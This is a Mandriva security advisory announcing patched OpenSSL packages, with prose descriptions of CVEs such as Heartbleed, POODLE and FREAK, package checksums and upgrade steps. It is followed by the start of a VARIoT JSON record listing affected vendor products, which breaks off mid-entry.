The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566). NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c (CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support (CVE-2015-0205).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt
Updated Packages:
Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS kz0ex6eI6hA6qSwklA2NoXY= =GYjX -----END PGP SIGNATURE-----
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201406-0142", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "0.9.8za" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "*" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.0" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "gte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "20" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "5" }, { "model": "fedora", "scope": "eq", "trust": 1.0, "vendor": "fedoraproject", "version": "19" }, { "model": "storage", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "2.1" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "mariadb", "scope": "lt", "trust": 1.0, "vendor": "mariadb", "version": "10.0.13" }, { "model": "openssl", "scope": "lt", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "mariadb", "scope": "gte", "trust": 1.0, "vendor": "mariadb", "version": "10.0.0" }, { "model": "linux enterprise workstation extension", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "linux enterprise server", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "opensuse", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "13.2" }, { "model": "bladecenter advanced management module 3.66e", "scope": null, "trust": 0.9, "vendor": "ibm", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 0.6, "vendor": "openssl", "version": "1.0.1g" }, { "model": "storevirtual 1tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433011.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.3" }, { "model": "chrome for android", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "35.0.1916.141" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5600v210.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.6.1" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ace application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.470" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1.3" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "big-ip analytics", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "9.1-release-p15", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "storevirtual 450gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "vpn client v100r001c02spc702", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "chrome for android", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "manageone v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "tivoli workload scheduler distributed ga level", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.6" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "big-ip edge clients for mac os", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "x7101" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "agile controller v100r001c00spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "project openssl 1.0.0h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mds switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart update manager for linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.3.5" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "telepresence tx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.2.2" }, { "model": "ftp server", "scope": "eq", "trust": 0.3, "vendor": "cerberus", "version": "7.0.0.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip edge clients for apple ios", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "2.0.3" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "updatexpress system packs installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.61" }, { "model": "usg5000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip psm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "asg2000 v100r001c10sph001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "wireless lan controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "vsm v200r002c00spc503", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "3.1.4" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32200" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "s5900 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.6" }, { "model": "documentum content server p05", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "jabber video for telepresence", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "storevirtual fc 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli workload scheduler distributed fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "aura communication manager utility services sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.16.1.0.9.8" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3200" }, { "model": "s2750\u0026s5700\u0026s6700 v100r006", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "blackberry enterprise service", "scope": "eq", "trust": 0.3, "vendor": "rim", "version": "10.1.1" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "advanced settings utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.60" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "nexus series fabric extenders", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "20000" }, { "model": "intelligencecenter", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "3.2" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storevirtual 600gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.3.2" }, { "model": "documentum content server p02", "scope": "eq", "trust": 0.3, "vendor": "emc", "version": "7.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "desktop collaboration experience dx650", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "storevirtual hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433511.5" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "storevirtual hybrid san solution", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "storevirtual vsa software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "12.0" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "smart update manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tandberg mxp", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7700" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "413012.0" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.1" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "epolicy orchestrator", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.6.6" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ddos secure", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": "5.14.1-1" }, { "model": "9.3-beta1-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "vsm v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "powervu d9190 comditional access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storevirtual 3tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453011.5" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "infosphere master data management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security network intrusion prevention system gx5008", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storevirtual china hybrid storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433512.5" }, { "model": "softco v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "s2700\u0026s3700 v100r006c05+v100r06h", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor s6800t v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "storevirtual 4tb mdl sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.6" }, { "model": "big-ip psm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 900gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "433012.5" }, { "model": "telepresence mcu series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "asg2000 v100r001c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "idp 5.1r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network intrusion prevention system gx4004", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "nac manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smc2.0 v100r002c01b017sp17", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storevirtual 900gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "463012.6" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "usg2000 v300r001c10sph201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "storevirtual 600gb sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "453012.5" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storevirtual 600gb sas storage/s-buy", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "473012.5" }, { "model": "open source security information management", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "2.1.5" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "storevirtual 900gb china sas storage", "scope": "eq", "trust": 0.3, "vendor": "hp", 